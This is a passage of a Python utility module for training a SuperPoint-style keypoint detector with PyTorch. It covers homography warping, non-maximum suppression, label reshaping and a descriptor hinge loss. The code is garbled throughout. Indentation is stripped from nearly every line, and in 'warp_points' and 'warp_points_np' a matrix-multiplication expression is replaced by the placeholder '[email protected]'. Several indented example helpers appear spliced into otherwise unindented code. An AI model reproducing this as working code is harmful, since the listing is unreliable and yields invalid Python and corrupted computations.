def is_default(key, value):
return value == parser.get_default(key)
args_dict = vars(args)
# data_folder_name = str(Path(args_dict['data']).normpath().name)
data_folder_name = str(Path(args_dict['data']))
folder_string = [data_folder_name]
if not is_default('epochs', args_dict['epochs']):
folder_string.append('{}epochs'.format(args_dict['epochs']))
keys_with_prefix = OrderedDict()
keys_with_prefix['epoch_size'] = 'epoch_size'
keys_with_prefix['sequence_length'] = 'seq'
keys_with_prefix['rotation_mode'] = 'rot_'
keys_with_prefix['padding_mode'] = 'padding_'
keys_with_prefix['batch_size'] = 'b'
keys_with_prefix['lr'] = 'lr'
keys_with_prefix['photo_loss_weight'] = 'p'
keys_with_prefix['mask_loss_weight'] = 'm'
keys_with_prefix['smooth_loss_weight'] = 's'
for key, prefix in keys_with_prefix.items():
value = args_dict[key]
if not is_default(key, value):
folder_string.append('{}{}'.format(prefix, value))
save_path = Path(','.join(folder_string))
timestamp = datetime.datetime.now().strftime("%m-%d-%H:%M")
return save_path/timestamp
# return ''
'''
def tensor2array(tensor, max_value=255, colormap='rainbow', channel_first=True):
tensor = tensor.detach().cpu()
if max_value is None:
max_value = tensor.max().item()
if tensor.ndimension() == 2 or tensor.size(0) == 1:
try:
import cv2
if int(cv2.__version__[0]) >= 3:
color_cvt = cv2.COLOR_BGR2RGB
else: # 2.4
color_cvt = cv2.cv.CV_BGR2RGB
if colormap == 'rainbow':
colormap = cv2.COLORMAP_RAINBOW
elif colormap == 'bone':
colormap = cv2.COLORMAP_BONE
array = (255*tensor.squeeze().numpy()/max_value).clip(0, 255).astype(np.uint8)
colored_array = cv2.applyColorMap(array, colormap)
array = cv2.cvtColor(colored_array, color_cvt).astype(np.float32)/255
except ImportError:
if tensor.ndimension() == 2:
tensor.unsqueeze_(2)
array = (tensor.expand(tensor.size(0), tensor.size(1), 3).numpy()/max_value).clip(0,1)
if channel_first:
array = array.transpose(2, 0, 1)
elif tensor.ndimension() == 3:
assert(tensor.size(0) == 3)
array = 0.5 + tensor.numpy()*0.5
if not channel_first:
array = array.transpose(1, 2, 0)
return array
# from utils.utils import find_files_with_ext
def find_files_with_ext(directory, extension='.npz'):
# print(os.listdir(directory))
list_of_files = []
import os
if extension == ".npz":
for l in os.listdir(directory):
if l.endswith(extension):
list_of_files.append(l)
# print(l)
return list_of_files
def save_checkpoint(save_path, net_state, epoch, filename='checkpoint.pth.tar'):
file_prefix = ['superPointNet']
# torch.save(net_state, save_path)
filename = '{}_{}_{}'.format(file_prefix[0], str(epoch), filename)
torch.save(net_state, save_path/filename)
print("save checkpoint to ", filename)
pass
def load_checkpoint(load_path, filename='checkpoint.pth.tar'):
file_prefix = ['superPointNet']
filename = '{}__{}'.format(file_prefix[0], filename)
# torch.save(net_state, save_path)
checkpoint = torch.load(load_path/filename)
print("load checkpoint from ", filename)
return checkpoint
pass
def saveLoss(filename, iter, loss, task='train', **options):
# save_file = save_output / "export.txt"
with open(filename, "a") as myfile:
myfile.write(task + " iter: " + str(iter) + ", ")
myfile.write("loss: " + str(loss) + ", ")
myfile.write(str(options))
myfile.write("\n")
# myfile.write("iter: " + str(iter) + '\n')
# myfile.write("output pairs: " + str(count) + '\n')
def saveImg(img, filename):
import cv2
cv2.imwrite(filename, img)
def pltImshow(img):
from matplotlib import pyplot as plt
plt.imshow(img)
plt.show()
def loadConfig(filename):
import yaml
with open(filename, 'r') as f:
config = yaml.load(f, Loader=yaml.FullLoader)
return config
def append_csv(file='foo.csv', arr=[]):
import csv
# fields=['first','second','third']
# pre = lambda i: ['{0:.3f}'.format(x) for x in i]
with open(file, 'a') as f:
writer = csv.writer(f)
if type(arr[0]) is list:
for a in arr:
writer.writerow(a)
# writer.writerow(pre(a))
# print(pre(a))
else:
writer.writerow(arr)
'''
def save_checkpoint(save_path, dispnet_state, exp_pose_state, is_best, filename='checkpoint.pth.tar'):
file_prefixes = ['dispnet', 'exp_pose']
states = [dispnet_state, exp_pose_state]
for (prefix, state) in zip(file_prefixes, states):
torch.save(state, save_path/'{}_{}'.format(prefix,filename))
if is_best:
for prefix in file_prefixes:
shutil.copyfile(save_path/'{}_{}'.format(prefix,filename), save_path/'{}_model_best.pth.tar'.format(prefix))
'''
import cv2
def sample_homography(inv_scale=3):
corner_img = np.array([(-1, -1), (-1, 1), (1, -1), (1, 1)])
# offset_r = 1 - 1/inv_scale
# img_offset = np.array([(-1, -1), (-1, offset_r), (offset_r, -1), (offset_r, offset_r)])
img_offset = corner_img
corner_map = (np.random.rand(4,2)-0.5)*2/(inv_scale + 0.01) + img_offset
matrix = cv2.getPerspectiveTransform(np.float32(corner_img), np.float32(corner_map))
return matrix
def sample_homographies(batch_size=1, scale=10, device='cpu'):
## sample homography matrix
# mat_H = [sample_homography(inv_scale=scale) for i in range(batch_size)]
mat_H = [sample_homography(inv_scale=scale) for i in range(batch_size)]
##### debug
# from utils.utils import sample_homo
# mat_H = [sample_homo(image=np.zeros((1,1))) for i in range(batch_size)]
# mat_H = [np.identity(3) for i in range(batch_size)]
mat_H = np.stack(mat_H, axis=0)
mat_H = torch.tensor(mat_H, dtype=torch.float32)
mat_H = mat_H.to(device)
mat_H_inv = torch.stack([torch.inverse(mat_H[i, :, :]) for i in range(batch_size)])
mat_H_inv = torch.tensor(mat_H_inv, dtype=torch.float32)
mat_H_inv = mat_H_inv.to(device)
return mat_H, mat_H_inv
def warpLabels(pnts, homography, H, W):
import torch
"""
input:
pnts: numpy
homography: numpy
output:
warped_pnts: numpy
"""
from utils.utils import warp_points
from utils.utils import filter_points
pnts = torch.tensor(pnts).long()
homography = torch.tensor(homography, dtype=torch.float32)
warped_pnts = warp_points(torch.stack((pnts[:, 0], pnts[:, 1]), dim=1),
homography) # check the (x, y)
warped_pnts = filter_points(warped_pnts, torch.tensor([W, H])).round().long()
return warped_pnts.numpy()
def warp_points_np(points, homographies, device='cpu'):
"""
Warp a list of points with the given homography.
Arguments:
points: list of N points, shape (N, 2).
homography: batched homographies of shape (B, 3, 3).
Returns: an array of shape (B, N, 2) containing the new coordinates of the
warped points.
"""
# expand points len to (x, y, 1)
batch_size = homographies.shape[0]
points = np.concatenate((points, np.ones((points.shape[0], 1))), axis=1)
# points = points.to(device)
# homographies = homographies.(batch_size*3,3)
# warped_points = homographies*points
# warped_points = [email protected](0,1)
warped_points = np.tensordot(homographies, points.transpose(), axes=([2], [0]))
# normalize the points
warped_points = warped_points.reshape([batch_size, 3, -1])
warped_points = warped_points.transpose([0, 2, 1])
warped_points = warped_points[:, :, :2] / warped_points[:, :, 2:]
return warped_points
def homography_scaling(homography, H, W):
trans = np.array([[2./W, 0., -1], [0., 2./H, -1], [0., 0., 1.]])
homography = np.linalg.inv(trans) @ homography @ trans
return homography
def homography_scaling_torch(homography, H, W):
trans = torch.tensor([[2./W, 0., -1], [0., 2./H, -1], [0., 0., 1.]])
homography = (trans.inverse() @ homography @ trans)
return homography
def filter_points(points, shape, return_mask=False):
### check!
points = points.float()
shape = shape.float()
mask = (points >= 0) * (points <= shape-1)
mask = (torch.prod(mask, dim=-1) == 1)
if return_mask:
return points[mask], mask
return points[mask]
# return points [torch.prod(mask, dim=-1) == 1]
def warp_points(points, homographies, device='cpu'):
"""
Warp a list of points with the given homography.
Arguments:
points: list of N points, shape (N, 2), in (x, y) order.
homography: batched or not (shapes (B, 3, 3) and (3, 3) respectively).
Returns: a Tensor of shape (N, 2) or (B, N, 2) (depending on whether the homography
is batched) containing the new coordinates of the warped points.
"""
# expand points len to (x, y, 1)
no_batches = len(homographies.shape) == 2
homographies = homographies.unsqueeze(0) if no_batches else homographies
# homographies = homographies.unsqueeze(0) if len(homographies.shape) == 2 else homographies
batch_size = homographies.shape[0]
points = torch.cat((points.float(), torch.ones((points.shape[0], 1)).to(device)), dim=1)
points = points.to(device)
homographies = homographies.view(batch_size*3,3)
# warped_points = homographies*points
# points = points.double()
warped_points = [email protected](0,1)
# warped_points = np.tensordot(homographies, points.transpose(), axes=([2], [0]))
# normalize the points
warped_points = warped_points.view([batch_size, 3, -1])
warped_points = warped_points.transpose(2, 1)
warped_points = warped_points[:, :, :2] / warped_points[:, :, 2:]
return warped_points[0,:,:] if no_batches else warped_points
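# Minimal sketch (assumption: the identity homography), showing that
# warp_points maps (x, y) coordinates and leaves them unchanged under
# the identity matrix.
def _example_warp_points():
    pts = torch.tensor([[10., 20.], [30., 40.]])   # (N, 2) in (x, y)
    H_identity = torch.eye(3)                      # single homography (3, 3)
    warped = warp_points(pts, H_identity)          # -> (N, 2), equal to pts
    return warped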
# from utils.utils import inv_warp_image_batch
def inv_warp_image_batch(img, mat_homo_inv, device='cpu', mode='bilinear'):
'''
Inverse warp images in batch
:param img:
batch of images
tensor [batch_size, 1, H, W]
:param mat_homo_inv:
batch of homography matrices
tensor [batch_size, 3, 3]
:param device:
GPU device or CPU
:return:
batch of warped images
tensor [batch_size, 1, H, W]
'''
# compute inverse warped points
if len(img.shape) == 2 or len(img.shape) == 3:
img = img.view(1,1,img.shape[0], img.shape[1])
if len(mat_homo_inv.shape) == 2:
mat_homo_inv = mat_homo_inv.view(1,3,3)
Batch, channel, H, W = img.shape
coor_cells = torch.stack(torch.meshgrid(torch.linspace(-1, 1, W), torch.linspace(-1, 1, H)), dim=2)
coor_cells = coor_cells.transpose(0, 1)
coor_cells = coor_cells.to(device)
coor_cells = coor_cells.contiguous()
src_pixel_coords = warp_points(coor_cells.view([-1, 2]), mat_homo_inv, device)
src_pixel_coords = src_pixel_coords.view([Batch, H, W, 2])
src_pixel_coords = src_pixel_coords.float()
warped_img = F.grid_sample(img, src_pixel_coords, mode=mode, align_corners=True)
return warped_img
def inv_warp_image(img, mat_homo_inv, device='cpu', mode='bilinear'):
'''
Inverse warp images in batch
:param img:
batch of images
tensor [H, W]
:param mat_homo_inv:
batch of homography matrices
tensor [3, 3]
:param device:
GPU device or CPU
:return:
batch of warped images
tensor [H, W]
'''
warped_img = inv_warp_image_batch(img, mat_homo_inv, device, mode)
return warped_img.squeeze()
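# Minimal sketch (assumption: a random single-channel image and the identity
# homography); inv_warp_image then returns the image essentially unchanged
# up to interpolation.
def _example_inv_warp_image():
    img = torch.rand(240, 320)      # [H, W]
    H_identity = torch.eye(3)       # [3, 3]
    warped = inv_warp_image(img, H_identity, device='cpu', mode='bilinear')
    return warped                   # [H, W]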
def labels2Dto3D(labels, cell_size, add_dustbin=True):
'''
Change the shape of labels into 3D. Batch of labels.
:param labels:
tensor [batch_size, 1, H, W]
keypoint map.
:param cell_size:
8
:return:
labels: tensors[batch_size, 65, Hc, Wc]
'''
batch_size, channel, H, W = labels.shape
Hc, Wc = H // cell_size, W // cell_size
space2depth = SpaceToDepth(8)
# labels = space2depth(labels).squeeze(0)
labels = space2depth(labels)
# labels = labels.view(batch_size, H, 1, W, 1)
# labels = labels.view(batch_size, Hc, cell_size, Wc, cell_size)
# labels = labels.transpose(1, 2).transpose(3, 4).transpose(2, 3)
# labels = labels.reshape(batch_size, 1, cell_size ** 2, Hc, Wc)
# labels = labels.view(batch_size, cell_size ** 2, Hc, Wc)
if add_dustbin:
dustbin = labels.sum(dim=1)
dustbin = 1 - dustbin
dustbin[dustbin < 1.] = 0
# print('dust: ', dustbin.shape)
# labels = torch.cat((labels, dustbin.view(batch_size, 1, Hc, Wc)), dim=1)
labels = torch.cat((labels, dustbin.view(batch_size, 1, Hc, Wc)), dim=1)
## norm
dn = labels.sum(dim=1)
labels = labels.div(torch.unsqueeze(dn, 1))
return labels
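# Shape-only sketch (assumption: a synthetic sparse keypoint map): converts a
# [batch, 1, H, W] map into the [batch, 65, H/8, W/8] representation with a
# dustbin channel, as described in the docstring above.
def _example_labels2Dto3D():
    labels = (torch.rand(2, 1, 120, 160) > 0.99).float()
    labels_3d = labels2Dto3D(labels, cell_size=8, add_dustbin=True)
    return labels_3d.shape   # torch.Size([2, 65, 15, 20])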
def labels2Dto3D_flattened(labels, cell_size):
'''
Change the shape of labels into 3D. Batch of labels.
:param labels:
tensor [batch_size, 1, H, W]
keypoint map.
:param cell_size:
8
:return:
labels: tensors[batch_size, 65, Hc, Wc]
'''
batch_size, channel, H, W = labels.shape
Hc, Wc = H // cell_size, W // cell_size
space2depth = SpaceToDepth(8)
# labels = space2depth(labels).squeeze(0)
labels = space2depth(labels)
# print("labels in 2Dto3D: ", labels.shape)
# labels = labels.view(batch_size, H, 1, W, 1)
# labels = labels.view(batch_size, Hc, cell_size, Wc, cell_size)
# labels = labels.transpose(1, 2).transpose(3, 4).transpose(2, 3)
# labels = labels.reshape(batch_size, 1, cell_size ** 2, Hc, Wc)
# labels = labels.view(batch_size, cell_size ** 2, Hc, Wc)
dustbin = torch.ones((batch_size, 1, Hc, Wc)).cuda()
# labels = torch.cat((labels, dustbin.view(batch_size, 1, Hc, Wc)), dim=1)
labels = torch.cat((labels*2, dustbin.view(batch_size, 1, Hc, Wc)), dim=1)
labels = torch.argmax(labels, dim=1)
return labels
def old_flatten64to1(semi, tensor=False):
'''
Flatten 3D np array to 2D
:param semi:
np [64 x Hc x Wc]
or
tensor (batch_size, 65, Hc, Wc)
:return:
flattened map
np [1 x Hc*8 x Wc*8]
or
tensor (batch_size, 1, Hc*8, Wc*8)
'''
if tensor:
is_batch = len(semi.size()) == 4
if not is_batch:
semi = semi.unsqueeze_(0)
Hc, Wc = semi.size()[2], semi.size()[3]
cell = 8
semi.transpose_(1, 2)
semi.transpose_(2, 3)
semi = semi.view(-1, Hc, Wc, cell, cell)
semi.transpose_(2, 3)
semi = semi.contiguous()
semi = semi.view(-1, 1, Hc * cell, Wc * cell)
heatmap = semi
if not is_batch:
heatmap = heatmap.squeeze_(0)
else:
Hc, Wc = semi.shape[1], semi.shape[2]
cell = 8
semi = semi.transpose(1, 2, 0)
heatmap = np.reshape(semi, [Hc, Wc, cell, cell])
heatmap = np.transpose(heatmap, [0, 2, 1, 3])
# heatmap = np.transpose(heatmap, [2, 0, 3, 1])
heatmap = np.reshape(heatmap, [Hc * cell, Wc * cell])
heatmap = heatmap[np.newaxis, :, :]
return heatmap
def flattenDetection(semi, tensor=False):
'''
Flatten detection output
:param semi:
output from detector head
tensor [65, Hc, Wc]
:or
tensor (batch_size, 65, Hc, Wc)
:return:
heatmap
tensor (1, H, W)
:or
tensor (batch_size, 1, H, W)
'''
batch = False
if len(semi.shape) == 4:
batch = True
batch_size = semi.shape[0]
# if tensor:
# semi.exp_()
# d = semi.sum(dim=1) + 0.00001
# d = d.view(d.shape[0], 1, d.shape[1], d.shape[2])
# semi = semi / d # how to /(64,15,20)
# nodust = semi[:, :-1, :, :]
# heatmap = flatten64to1(nodust, tensor=tensor)
# else:
# Convert pytorch -> numpy.
# --- Process points.
# dense = nn.functional.softmax(semi, dim=0) # [65, Hc, Wc]
if batch:
dense = nn.functional.softmax(semi, dim=1) # [batch, 65, Hc, Wc]
# Remove dustbin.
nodust = dense[:, :-1, :, :]
else:
dense = nn.functional.softmax(semi, dim=0) # [65, Hc, Wc]
nodust = dense[:-1, :, :].unsqueeze(0)
# Reshape to get full resolution heatmap.
# heatmap = flatten64to1(nodust, tensor=True) # [1, H, W]
depth2space = DepthToSpace(8)
heatmap = depth2space(nodust)
heatmap = heatmap.squeeze(0) if not batch else heatmap
return heatmap
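# Minimal sketch (assumption: a random raw detector output): turns the
# [batch, 65, Hc, Wc] "semi" tensor into a full-resolution heatmap via
# softmax, dustbin removal and depth-to-space.
def _example_flattenDetection():
    semi = torch.rand(2, 65, 15, 20)   # raw detector head output
    heatmap = flattenDetection(semi)   # -> [2, 1, 120, 160]
    return heatmap.shape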
def sample_homo(image):
import tensorflow as tf
from utils.homographies import sample_homography
H = sample_homography(tf.shape(image)[:2])
with tf.Session():
H_ = H.eval()
H_ = np.concatenate((H_, np.array([1])[:, np.newaxis]), axis=1)
# warped_im = tf.contrib.image.transform(image, H, interpolation="BILINEAR")
mat = np.reshape(H_, (3, 3))
# for i in range(batch):
# np.stack()
return mat
import cv2
def getPtsFromHeatmap(heatmap, conf_thresh, nms_dist):
'''
:param self:
:param heatmap:
np (H, W)
:return:
'''
border_remove = 4
H, W = heatmap.shape[0], heatmap.shape[1]
xs, ys = np.where(heatmap >= conf_thresh) # Confidence threshold.
sparsemap = (heatmap >= conf_thresh)
if len(xs) == 0:
return np.zeros((3, 0))
pts = np.zeros((3, len(xs))) # Populate point data sized 3xN.
pts[0, :] = ys
pts[1, :] = xs
pts[2, :] = heatmap[xs, ys]
pts, _ = nms_fast(pts, H, W, dist_thresh=nms_dist) # Apply NMS.
inds = np.argsort(pts[2, :])
pts = pts[:, inds[::-1]] # Sort by confidence.
# Remove points along border.
bord = border_remove
toremoveW = np.logical_or(pts[0, :] < bord, pts[0, :] >= (W - bord))
toremoveH = np.logical_or(pts[1, :] < bord, pts[1, :] >= (H - bord))
toremove = np.logical_or(toremoveW, toremoveH)
pts = pts[:, ~toremove]
return pts
def box_nms(prob, size, iou=0.1, min_prob=0.01, keep_top_k=0):
# requires https://github.com/open-mmlab/mmdetection.
# Warning : BUILD FROM SOURCE using command MMCV_WITH_OPS=1 pip install -e
# from mmcv.ops import nms as nms_mmdet
from torchvision.ops import nms
"""Performs non maximum suppression on the heatmap by considering hypothetical
bounding boxes centered at each pixel's location (e.g. corresponding to the receptive
field). Optionally only keeps the top k detections.
Arguments:
prob: the probability heatmap, with shape `[H, W]`.
size: a scalar, the size of the bounding boxes.
iou: a scalar, the IoU overlap threshold.
min_prob: a threshold under which all probabilities are discarded before NMS.
keep_top_k: an integer, the number of top scores to keep.
"""
pts = torch.nonzero(prob > min_prob).float() # [N, 2]
prob_nms = torch.zeros_like(prob)
if pts.nelement() == 0:
return prob_nms
size = torch.tensor(size/2.).cuda()
boxes = torch.cat([pts-size, pts+size], dim=1) # [N, 4]
scores = prob[pts[:, 0].long(), pts[:, 1].long()]
if keep_top_k != 0:
indices = nms(boxes, scores, iou)
else:
raise NotImplementedError
# indices, _ = nms(boxes, scores, iou, boxes.size()[0])
# print("boxes: ", boxes.shape)
# print("scores: ", scores.shape)
# proposals = torch.cat([boxes, scores.unsqueeze(-1)], dim=-1)
# dets, indices = nms_mmdet(proposals, iou)
# indices = indices.long()
# indices = box_nms_retinaNet(boxes, scores, iou)
pts = torch.index_select(pts, 0, indices)
scores = torch.index_select(scores, 0, indices)
prob_nms[pts[:, 0].long(), pts[:, 1].long()] = scores
return prob_nms
def nms_fast(in_corners, H, W, dist_thresh):
"""
Run a faster approximate Non-Max-Suppression on numpy corners shaped:
3xN [x_i,y_i,conf_i]^T
Algo summary: Create a grid sized HxW. Assign each corner location a 1, rest
are zeros. Iterate through all the 1's and convert them either to -1 or 0.
Suppress points by setting nearby values to 0.
Grid Value Legend:
-1 : Kept.
0 : Empty or suppressed.
1 : To be processed (converted to either kept or suppressed).
NOTE: The NMS first rounds points to integers, so NMS distance might not
be exactly dist_thresh. It also assumes points are within image boundaries.
Inputs
in_corners - 3xN numpy array with corners [x_i, y_i, confidence_i]^T.
H - Image height.
W - Image width.
dist_thresh - Distance to suppress, measured as an infinity norm distance.
Returns
nmsed_corners - 3xN numpy matrix with surviving corners.
nmsed_inds - N length numpy vector with surviving corner indices.
"""
grid = np.zeros((H, W)).astype(int) # Track NMS data.
inds = np.zeros((H, W)).astype(int) # Store indices of points.
# Sort by confidence and round to nearest int.
inds1 = np.argsort(-in_corners[2, :])
corners = in_corners[:, inds1]
rcorners = corners[:2, :].round().astype(int) # Rounded corners.
# Check for edge case of 0 or 1 corners.
if rcorners.shape[1] == 0:
return np.zeros((3, 0)).astype(int), np.zeros(0).astype(int)
if rcorners.shape[1] == 1:
out = np.vstack((rcorners, in_corners[2])).reshape(3, 1)
return out, np.zeros((1)).astype(int)
# Initialize the grid.
for i, rc in enumerate(rcorners.T):
grid[rcorners[1, i], rcorners[0, i]] = 1
inds[rcorners[1, i], rcorners[0, i]] = i
# Pad the border of the grid, so that we can NMS points near the border.
pad = dist_thresh
grid = np.pad(grid, ((pad, pad), (pad, pad)), mode='constant')
# Iterate through points, highest to lowest conf, suppress neighborhood.
count = 0
for i, rc in enumerate(rcorners.T):
# Account for top and left padding.
pt = (rc[0] + pad, rc[1] + pad)
if grid[pt[1], pt[0]] == 1: # If not yet suppressed.
grid[pt[1] - pad:pt[1] + pad + 1, pt[0] - pad:pt[0] + pad + 1] = 0
grid[pt[1], pt[0]] = -1
count += 1
# Get all surviving -1's and return sorted array of remaining corners.
keepy, keepx = np.where(grid == -1)
keepy, keepx = keepy - pad, keepx - pad
inds_keep = inds[keepy, keepx]
out = corners[:, inds_keep]
values = out[-1, :]
inds2 = np.argsort(-values)
out = out[:, inds2]
out_inds = inds1[inds_keep[inds2]]
return out, out_inds
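# Minimal sketch (assumption: three synthetic corners): the second corner
# lies within dist_thresh of a stronger one and is therefore suppressed.
def _example_nms_fast():
    corners = np.array([[10., 11., 50.],    # x coordinates
                        [10., 10., 50.],    # y coordinates
                        [0.9, 0.8, 0.7]])   # confidences
    kept, kept_inds = nms_fast(corners, H=100, W=100, dist_thresh=4)
    return kept, kept_inds                  # two corners survive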
def compute_valid_mask(image_shape, inv_homography, device='cpu', erosion_radius=0):
"""
Compute a boolean mask of the valid pixels resulting from an homography applied to
an image of a given shape. Pixels that are False correspond to bordering artifacts.
A margin can be discarded using erosion.
Arguments:
image_shape: the image shape, i.e. `[H, W]`.
inv_homography: inverse homography Tensor of shape (3, 3) or (B, 3, 3), where B is the batch size.
erosion_radius: radius of the margin to be discarded.
Returns: a Tensor of shape (B, H, W) with ones at valid pixels.
"""
# mask = H_transform(tf.ones(image_shape), homography, interpolation='NEAREST')
# mask = H_transform(tf.ones(image_shape), homography, interpolation='NEAREST')
if inv_homography.dim() == 2:
inv_homography = inv_homography.view(-1, 3, 3)
batch_size = inv_homography.shape[0]
mask = torch.ones(batch_size, 1, image_shape[0], image_shape[1]).to(device)
mask = inv_warp_image_batch(mask, inv_homography, device=device, mode='nearest')
mask = mask.view(batch_size, image_shape[0], image_shape[1])
mask = mask.cpu().numpy()
if erosion_radius > 0:
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (erosion_radius*2,)*2)
for i in range(batch_size):
mask[i, :, :] = cv2.erode(mask[i, :, :], kernel, iterations=1)
return torch.tensor(mask).to(device)
def normPts(pts, shape):
"""
normalize pts to [-1, 1]
:param pts:
tensor (y, x)
:param shape:
tensor shape (y, x)
:return:
"""
pts = pts/shape*2 - 1
return pts
def denormPts(pts, shape):
"""
denormalize pts back to H, W
:param pts:
tensor (y, x)
:param shape:
numpy (y, x)
:return:
"""
pts = (pts+1)*shape/2
return pts
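# Round-trip sketch (assumption: points given as (y, x) with image shape
# (240, 320)): normPts maps into [-1, 1] and denormPts maps back.
def _example_norm_denorm():
    shape = torch.tensor([240., 320.])
    pts = torch.tensor([[0., 0.], [120., 160.], [239., 319.]])
    pts_n = normPts(pts, shape)          # roughly in [-1, 1]
    pts_back = denormPts(pts_n, shape)   # equals pts up to float error
    return pts_back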
# def subpixel_loss(image, labels, dense_desc, patch_size=8):
# # concat image and dense_desc
# # extract patches
# #
# pass
def descriptor_loss(descriptors, descriptors_warped, homographies, mask_valid=None,
cell_size=8, lamda_d=250, device='cpu', descriptor_dist=4, **config):
'''
Compute descriptor loss from descriptors_warped and given homographies
:param descriptors:
Output from descriptor head
tensor [batch_size, descriptors, Hc, Wc]
:param descriptors_warped:
Output from descriptor head of warped image
tensor [batch_size, descriptors, Hc, Wc]
:param homographies:
known homographies
:param cell_size:
8
:param device:
gpu or cpu
:param config:
:return:
loss, and other tensors for visualization
'''
# put to gpu
homographies = homographies.to(device)
# config
from utils.utils import warp_points
lamda_d = lamda_d # 250
margin_pos = 1
margin_neg = 0.2
batch_size, Hc, Wc = descriptors.shape[0], descriptors.shape[2], descriptors.shape[3]
#####
# H, W = Hc.numpy().astype(int) * cell_size, Wc.numpy().astype(int) * cell_size
H, W = Hc * cell_size, Wc * cell_size
#####
with torch.no_grad():
# shape = torch.tensor(list(descriptors.shape[2:]))*torch.tensor([cell_size, cell_size]).type(torch.FloatTensor).to(device)
shape = torch.tensor([H, W]).type(torch.FloatTensor).to(device)
# compute the center pixel of every cell in the image
coor_cells = torch.stack(torch.meshgrid(torch.arange(Hc), torch.arange(Wc)), dim=2)
coor_cells = coor_cells.type(torch.FloatTensor).to(device)
coor_cells = coor_cells * cell_size + cell_size // 2
## coord_cells is now a grid containing the coordinates of the Hc x Wc
## center pixels of the 8x8 cells of the image
# coor_cells = coor_cells.view([-1, Hc, Wc, 1, 1, 2])
coor_cells = coor_cells.view([-1, 1, 1, Hc, Wc, 2]) # be careful of the order
# warped_coor_cells = warp_points(coor_cells.view([-1, 2]), homographies, device)
warped_coor_cells = normPts(coor_cells.view([-1, 2]), shape)
warped_coor_cells = torch.stack((warped_coor_cells[:,1], warped_coor_cells[:,0]), dim=1) # (y, x) to (x, y)
warped_coor_cells = warp_points(warped_coor_cells, homographies, device)
warped_coor_cells = torch.stack((warped_coor_cells[:, :, 1], warped_coor_cells[:, :, 0]), dim=2) # (batch, x, y) to (batch, y, x)
shape_cell = torch.tensor([H//cell_size, W//cell_size]).type(torch.FloatTensor).to(device)
# warped_coor_mask = denormPts(warped_coor_cells, shape_cell)
warped_coor_cells = denormPts(warped_coor_cells, shape)
# warped_coor_cells = warped_coor_cells.view([-1, 1, 1, Hc, Wc, 2])
warped_coor_cells = warped_coor_cells.view([-1, Hc, Wc, 1, 1, 2])
# print("warped_coor_cells: ", warped_coor_cells.shape)
# compute the pairwise distance
cell_distances = coor_cells - warped_coor_cells
cell_distances = torch.norm(cell_distances, dim=-1)
##### check
# print("descriptor_dist: ", descriptor_dist)
mask = cell_distances <= descriptor_dist # 0.5 # trick
mask = mask.type(torch.FloatTensor).to(device)
# compute the pairwise dot product between descriptors: d^t * d
descriptors = descriptors.transpose(1, 2).transpose(2, 3)
descriptors = descriptors.view((batch_size, Hc, Wc, 1, 1, -1))
descriptors_warped = descriptors_warped.transpose(1, 2).transpose(2, 3)
descriptors_warped = descriptors_warped.view((batch_size, 1, 1, Hc, Wc, -1))
dot_product_desc = descriptors * descriptors_warped
dot_product_desc = dot_product_desc.sum(dim=-1)
## dot_product_desc.shape = [batch_size, Hc, Wc, Hc, Wc, desc_len]
# hinge loss
positive_dist = torch.max(margin_pos - dot_product_desc, torch.tensor(0.).to(device))
# positive_dist[positive_dist < 0] = 0
negative_dist = torch.max(dot_product_desc - margin_neg, torch.tensor(0.).to(device))
# negative_dist[neative_dist < 0] = 0
# sum of the dimension
if mask_valid is None:
# mask_valid = torch.ones_like(mask)
mask_valid = torch.ones(batch_size, 1, Hc*cell_size, Wc*cell_size)
mask_valid = mask_valid.view(batch_size, 1, 1, mask_valid.shape[2], mask_valid.shape[3])
loss_desc = lamda_d * mask * positive_dist + (1 - mask) * negative_dist
loss_desc = loss_desc * mask_valid
# mask_validg = torch.ones_like(mask)
##### bug in normalization
normalization = (batch_size * (mask_valid.sum()+1) * Hc * Wc)
pos_sum = (lamda_d * mask * positive_dist/normalization).sum()
neg_sum = ((1 - mask) * negative_dist/normalization).sum()
loss_desc = loss_desc.sum() / normalization
# loss_desc = loss_desc.sum() / (batch_size * Hc * Wc)
# return loss_desc, mask, mask_valid, positive_dist, negative_dist
return loss_desc, mask, pos_sum, neg_sum
"""
pos_pairs = mask * positive_dist
pos_pairs = pos_pairs[pos_pairs != 0]
print("pos_pairs mean: ", pos_pairs.mean())
print("pos_pairs max: ", pos_pairs.max())
print("pos_pairs min: ", pos_pairs.min())
===
print("pos_pairs mean: ", pos_pairs.mean())
pos_pairs mean: tensor(0.6237, device='cuda:0', grad_fn=<MeanBackward1>)
print("pos_pairs max: ", pos_pairs.max())
pos_pairs max: tensor(1.3984, device='cuda:0', grad_fn=<MaxBackward1>)
print("pos_pairs min: ", pos_pairs.min())
pos_pairs min: tensor(0.1569, device='cuda:0', grad_fn=<MinBackward1>)
(pos_pairs < 0.3).sum()
Out[9]: tensor(88, device='cuda:0')
(pos_pairs < 0.5).sum()
Out[10]: tensor(393, device='cuda:0')
(pos_pairs < 0.7).sum()
Out[11]: tensor(703, device='cuda:0')
"""
def sumto2D(ndtensor):
# input tensor: [batch_size, Hc, Wc, Hc, Wc]
# output tensor: [batch_size, Hc, Wc]
return ndtensor.sum(dim=1).sum(dim=1)
def mAP(pred_batch, labels_batch):
pass
def precisionRecall_torch(pred, labels):
offset = 10**-6
assert pred.size() == labels.size(), 'Sizes of pred, labels should match when you get the precision/recall!'
precision = torch.sum(pred*labels) / (torch.sum(pred)+ offset)
recall = torch.sum(pred*labels) / (torch.sum(labels) + offset)
if precision.item() > 1.:
print(pred)
print(labels)
from scipy.io import savemat
savemat('pre_recall.mat', {'pred': pred, 'labels': labels})
assert precision.item() <=1. and precision.item() >= 0.
return {'precision': precision, 'recall': recall}
def precisionRecall(pred, labels, thd=None):
offset = 10**-6
if thd is None:
precision = np.sum(pred*labels) / (np.sum(pred)+ offset)
recall = np.sum(pred*labels) / (np.sum(labels) + offset)
return {'precision': precision, 'recall': recall}
def getWriterPath(task='train', exper_name='', date=True):
import datetime
prefix = 'runs/'
str_date_time = ''
if exper_name != '':
exper_name += '_'
if date:
str_date_time = datetime.datetime.now().strftime("%Y-%m-%d_%H:%M:%S")
return prefix + task + '/' + exper_name + str_date_time
def crop_or_pad_choice(in_num_points, out_num_points, shuffle=False):
# Adapted from https://github.com/haosulab/frustum_pointnet/blob/635c938f18b9ec1de2de717491fb217df84d2d93/fpointnet/data/datasets/utils.py
"""Crop or pad point cloud to a fixed number; return the indexes
Args:
points (np.ndarray): point cloud. (n, d)
num_points (int): the number of output points
shuffle (bool): whether to shuffle the order
Returns:
np.ndarray: output point cloud
np.ndarray: index to choose input points
"""
if shuffle:
